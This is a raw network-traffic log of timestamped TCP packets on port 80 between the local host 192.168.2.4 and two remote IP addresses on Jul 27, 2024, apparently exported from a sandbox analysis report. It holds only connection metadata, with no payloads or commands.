Jul 27, 2024 08:53:59.770581007 CEST	80	50688	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:59.770678997 CEST	50688	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:59.770762920 CEST	50688	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:59.773786068 CEST	50689	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:59.776173115 CEST	80	50688	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:59.779436111 CEST	80	50689	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:59.779663086 CEST	50689	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:59.779663086 CEST	50689	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:59.779663086 CEST	50689	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:53:59.785074949 CEST	80	50689	78.89.199.216	192.168.2.4
Jul 27, 2024 08:53:59.785114050 CEST	80	50689	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:00.984730005 CEST	80	50689	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:00.985241890 CEST	80	50689	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:00.985640049 CEST	50689	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:00.985640049 CEST	50689	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:00.990647078 CEST	50690	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:00.990971088 CEST	80	50689	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:00.996172905 CEST	80	50690	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:00.996408939 CEST	50690	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:00.996542931 CEST	50690	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:00.996543884 CEST	50690	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:01.002024889 CEST	80	50690	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:01.002067089 CEST	80	50690	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:02.228390932 CEST	80	50690	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:02.228436947 CEST	80	50690	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:02.228581905 CEST	50690	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:02.228665113 CEST	50690	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:02.230518103 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.234215975 CEST	80	50690	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:02.235694885 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.235908985 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.235908985 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.241255045 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842060089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842106104 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842143059 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842175961 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842212915 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842246056 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842278957 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842293024 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.842293024 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.842293024 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.842313051 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842349052 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842361927 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.842386007 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.842613935 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.847695112 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.847743034 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.847779036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.849267960 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.934959888 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935009003 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935044050 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935079098 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935120106 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935136080 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935153008 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935168982 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935184956 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935204029 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.935410976 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.935528994 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.936012030 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936115980 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936153889 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936311007 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.936336994 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936393023 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936412096 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.936428070 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936460972 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936520100 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.936702967 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.936702967 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.937371969 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.937422991 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.937455893 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.937484026 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.937488079 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.937524080 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.937550068 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:02.941078901 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:02.941190958 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.027204037 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027224064 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027234077 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027241945 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027249098 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027256966 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027264118 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027271986 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027280092 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027287006 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027303934 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.027757883 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.027992010 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028017998 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028027058 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028034925 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028441906 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028464079 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028460979 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.028491020 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028507948 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028529882 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028703928 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028719902 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028743982 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028767109 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028783083 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028798103 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028814077 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028812885 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.028812885 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.028812885 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.028812885 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.028812885 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.028829098 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028845072 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.028909922 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.028909922 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.029603004 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029628992 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029650927 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029671907 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.029675007 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029690981 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029706955 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029716015 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.029721975 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029738903 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029752970 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.029772043 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.029773951 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.029824972 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.030586958 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.030601978 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.030616999 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.030631065 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.030646086 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.030651093 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.030661106 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.030688047 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.030726910 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.119857073 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119879007 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119894028 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119920015 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119935036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119949102 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119963884 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119978905 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.119993925 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120007992 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120029926 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120045900 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120060921 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120074987 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120089054 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120094061 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120094061 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120094061 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120105028 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120183945 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120183945 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120183945 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120368958 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120395899 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120412111 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120428085 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120441914 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120460033 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120560884 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120560884 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120562077 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.120929003 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120960951 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120976925 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.120991945 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121006966 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121022940 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121107101 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121123075 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121124029 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121124983 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121124983 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121139050 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121154070 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121169090 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121185064 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121192932 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121201992 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121227026 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121265888 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121771097 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121786118 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121809959 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121824026 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121830940 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121840000 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121855021 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121869087 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121870995 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121886015 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121901035 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121912956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121917009 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.121942997 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.121978998 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.122437000 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122493982 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.122534990 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122550011 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122565031 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122579098 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122608900 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122615099 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.122625113 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122637987 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.122642040 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122657061 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122672081 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122685909 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.122687101 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122701883 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122713089 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.122718096 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.122755051 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.122792006 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.123267889 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123292923 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123308897 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123351097 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.123362064 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123384953 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123399973 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123414993 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123418093 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.123430967 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123445988 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.123459101 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.123493910 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.124031067 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124046087 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124061108 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124075890 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124089956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.124118090 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.124289036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124305010 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124320984 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124336004 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.124346972 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.124382019 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.174465895 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212532043 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212553024 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212569952 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212584972 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212599993 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212615967 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212631941 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212646961 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212661982 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212686062 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212709904 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212733030 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212748051 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212755919 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212755919 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212757111 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212757111 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212764025 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212779999 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212794065 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212810040 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212825060 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212830067 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212830067 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212841034 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212857008 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212871075 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212878942 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212884903 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212899923 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212914944 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212930918 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212944984 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212949038 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212960005 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212975979 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.212990046 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212990046 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.212991953 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213021994 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213572025 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213604927 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213620901 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213637114 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213654995 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213660955 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213676929 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213692904 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213707924 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213721037 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213721037 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213722944 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213738918 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213748932 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213754892 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213769913 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213784933 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213799000 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213804960 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213804960 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213814020 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213830948 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213845968 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213860989 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213864088 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213876963 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213891983 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213906050 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213913918 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.213931084 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.213960886 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.214356899 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214380026 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214396954 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214411974 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.214427948 CEST	80	50691	64.190.113.113	192.168.2.4
